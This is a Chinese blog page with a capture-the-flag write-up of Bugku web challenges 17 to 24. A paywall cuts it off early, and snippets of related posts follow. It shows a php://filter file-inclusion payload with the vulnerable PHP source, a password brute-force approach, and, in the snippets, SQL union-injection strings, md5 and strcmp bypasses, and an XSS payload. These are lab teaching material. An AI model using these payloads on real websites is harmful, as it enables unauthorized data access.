bugku web 17~24 write up

最新推荐文章于 2021-04-10 19:56:50 发布
最新推荐文章于 2021-04-10 19:56:50 发布
阅读量1.8k 收藏 2
点赞数 1
分类专栏: ctf练习 文章标签: bugku
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w0ryitang/article/details/80147275
版权
这篇博客详细记录了作者在Bugku平台完成Web挑战17到24的过程,涉及文件包含漏洞、密码爆破、源码泄露、SQL注入、时间计算和Cookies欺骗等多个安全问题的解决方法。通过Payload构造和分析,最终成功获取各关卡的flag。
摘要由CSDN通过智能技术生成

bugku web 17~24 write up

flag在index里

打开页面有一个链接,点击链接发现url栏出现file,关键字想到文件包含漏洞。
关于文件包含漏洞的学习可以参考链接:https://zhuanlan.zhihu.com/p/25069779

直接修改file参数:http://120.24.86.145:8005/post/index.php?file=index.php
发现没有得到我们想要的信息,思路中断,上网搜。

了解了一下php://filter伪协议:
https://www.cnblogs.com/likai/archive/2010/01/29/1659336.html
以及php://filter的一些应用:
https://www.leavesongs.com/PENETRATION/php-filter-magic.html

补充相关知识后,明白php://filter可以进行文件读取:
payload:
http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

得到一串base64码,解码整理如下:

<html>
    <title>Bugku-ctf</title>

<?php
    error_reporting(0);
    if(!$_GET[file]){
  echo '<a href="./index.php?file=show.php">click me? no</a>';}
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag:flag{???????}//打码
?>
</html>

得到flag

输入密码查看flag

页面提示密码只有五位数,爆破,简单粗暴。
1.burp爆破:
关于burp的使用可参考链接:

最低0.47元/天 解锁文章
h0ryit
关注
专栏目录
BugkuCTF-web24(解题思路及步骤)
分享与记录
04-14 2499
看题 到处找,都没有额外信息 抓包 发现“链接”那个地方隐藏了一个a标签,点击跳转,得到代码 分析代码 <?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1)
bugku Web write up 一
0verWatch的博客
02-14 2770
web2 view-source:查看源码即可 文件上传测试 上传一个PHP文件发现他要的是图片文件,抓包先改一下content-type为image/jpeg,Go一下发现flag 计算器 F12调出开发者工具,把maxlength改为更长的长度即可 web基础$_GET 完全就是考php基础,直接URL加上index.php?what=flag即可 web基...
bugku-web24
baidu_39504221的博客
12-23 299
先看源码 <?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1) == md5($v2)){ if(!strcmp($v3, $flag)){
Bugku-WEB-web24
fallingskies
12-31 367
先f12看一下源码 发现有一个链接,指向code.txt v1和v2利用之前md5碰撞的那道题的方法绕过。 strcmp用法参考https://www.w3school.com.cn/php/func_string_strcmp.asp 但strcmp无法比较数组,会返回0. 构造 v1=QNKCDZO&v2=s878926199a&v3[]=1 ...
bugkuweb24
EC_Carrot的博客
12-23 244
题目 打开题目,查看源代码发现code.txt界面,点开来发现源码 <?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1) == md5($v2)){
bugku web17
PRCORANGE的博客
04-10 158
题目 首先测试正常数据。 尝试在正常数据后加上单引号,发现数据为空 传入1’’#可以正常输出 尝试获取列数,得知是4列 尝试直接联合查询 获取数据库名 根据数据库去查表名 找列名 获取数据 找到flag ...
bugku Web write up 二
0verWatch的博客
02-20 7325
XSS 先来最简单的弹窗 ?id=&lt;srcipt&gt;altert(/xss/)&lt;/script&gt; 查看源码 发现&lt;&gt;被过滤掉了 这里学到一个技巧,就是用Unicode编码绕过 payload:?id=\u003cimg src=1 onerror=alert(_key_)\u003e 速度要快 这种题就是编程题 上脚本,注意这题是用m...
旧版Bugku-Web题目下载及write up(相对简单).doc
最新发布
08-24
旧版Bugku-Web题目下载及write up(相对简单)
bugku 38~ 48 write up(web)
giun的博客
04-08 598
一、第38题(这是一个神奇的登陆框) 方法一 首先我们抓包, 经过一些尝试发现存在sql注入,并且sql语句是使用“来闭合的。 爆数据库 admin_name=1" union select database(),2#&admin_passwd=1&submit=GO+GO+GO 爆数据表 admin_name=1" union select (select table_nam...
[Bugku][Web][CTF] 16-29 write up
dadongwudi的博客
12-26 366
web16 备份是个好习惯 /index.php.bak 查看php代码 1.因为md5()函数加密不能处理数组,则key1和key2的返回值为空,即可获得flag http://123.206.87.240:8002/web16/?kkeyey1[]=1&kkeyey2[]=4 2.利用==比较漏洞 如果两个字符经MD5加密后的值为 0exxxxx形式,就会被认为是科学计数法,且表示的是0*10的xxxx次方,还是零,都是相等的。 下列的字符串的MD5值都是0e开头的: QNKCDZO 2406
Bugku CTF web17Web
ChaoYue_miku的博客
02-28 561
0、打开网页,根据提示判断为SQL联合注入 要求查询列数相同,其中有Name、Math、 English、Chinese 一共四个数据,因此需要select 1,2,3,4 1、构造语句:id=0' union select 1,2,3,4# 有回显,进一步查询数据库 2、查询数据库:id=0' union select 1,2,3,database()# 得到数据库名:skctf 3、查询数据表:id=0' union select 1,2,3,table_name fro..
Bugku CTF web24Web
ChaoYue_miku的博客
03-07 313
0、打开网页,有一段“凄美”的爱情故事(哈哈哈!) 分手了,纠结再三我没有拉黑她,原因无它,放不下。 终于那天,竟然真的等来了她的消息:“在吗?” 我神色平静,但颤抖的双手却显示出我此刻的激动。“怎么了?有事要我帮忙?” “怎么,没事就不能联系了吗?”结尾处调皮表情,是多么的陌生和熟悉…… “帮我看看这个...”说着,她发来一个链接。 不忍心拂她的意就点开了链接,看着屏幕我的心久久不能平静,往事一幕幕涌上心头...... 。。。。。。 “我到底做错了什么,要给我看这个!” “还记得你
bugku web
沐目的博客
05-06 1015
bugku web8 可算是自己写出来一道代码审计的题,虽然比较简单。 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "&...
bugku 17~ 20write up(web)
giun的博客
03-14 430
一、第17题(输入密码查看flag)。 暴力破解,可得密码,然后输入密码可得flag 二、 第18题(点击一百万次) 查看源码可以发现,url以post的方式提交点击的次数,那么使用hacker的post功能,直接修改clicks=1000000,即可得出flag 三、第19题(备份是个好习惯) **小知识:*备份文件的扩展名一般为.swp,.bak 打开题目是一串字母,应该是MD5加密我们...
BugKu Web(21-25)
kid的博客
06-06 1979
BugKu Web(21-25) 前言 bugku刷题,本来想每10道写一篇的,但水平有限,发现到这里题目难度已经有点大了,所以每5道题整合一篇吧… 题目 秋名山老司机 登陆可以看到如上提示,然后快速刷新可以看到要求是post提交,键名为value 这肯定是人工没法完成的,必须写脚本 py脚本写起来的时候,没有用过eval函数,是真的痛苦,不断字符串处理,条件判断… 最后还不对,最后看...
bugku 1~11题 write up(web
giun的博客
03-06 705
一、第一题(web2) 查看源代码,查找flag,即可得出flag。 二、第二题(计算器) 输入163,发现只能输入一位数。位数被限制了。我们使用火狐浏览器的开发者工具(F12)调出来。定位到输入框的位置。发现 最大位数被限制了,把1改成3即可得出flag。 三、第三题(web基础$_GET) 打开题目发现是PHP代码,阅读代码可知,我们在URL中传入参数?what=flag即可得出flag ...
bugku Misc write up
0verWatch的博客
02-14 4987
签到题 直接关注公众号即可,不多说 这是一张单纯的图片 打开拉到最后发现Html编码,上python脚本。。。。 str2 = '你看到的编码' from HTMLParser import HTMLParser h = HTMLParser() s2 = h.unescape(str2) s1 = h.unescape(h.unescape(str2)) print ...
bugkuweb题-ctf入门(10-17
memery_key的博客
05-23 711
10、变量** http://120.24.86.145:8004/index1.php flag In the variable ! <?php error_reporting(0); // 关闭php错误显示 include "flag1.php"; // 引入flag1.php文件代码 highlight_file(__file__);
Bugkuweb 成绩单
qq_26961571的博客
06-23 310
从这里开始进入SQL注入的普通模式啦!!撒花~~ ​ 虽然真的学过数据库,可是需要有很熟悉的PHP和数据库变量名字的理解,大概才能很好的学习这个部分。 首先打开这个题目, 快来查查成绩吧! 这里还是有一些提示的,框框里面要求输入1,2,3这种数字以便查询。但是...我们怎么能用普通的思维呢???!! 那么先什么都不输入看看。 什么都木有啊! 还是输个1看看。 接下来输了2和3也是有数据的,4就没有数据了,感觉这个数据库表...
bugku web进阶。。buuctf web
gudugeji的博客
01-17 468
1 phpcmsv9 御剑扫描,访问.txt的网址,发现flag 2
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值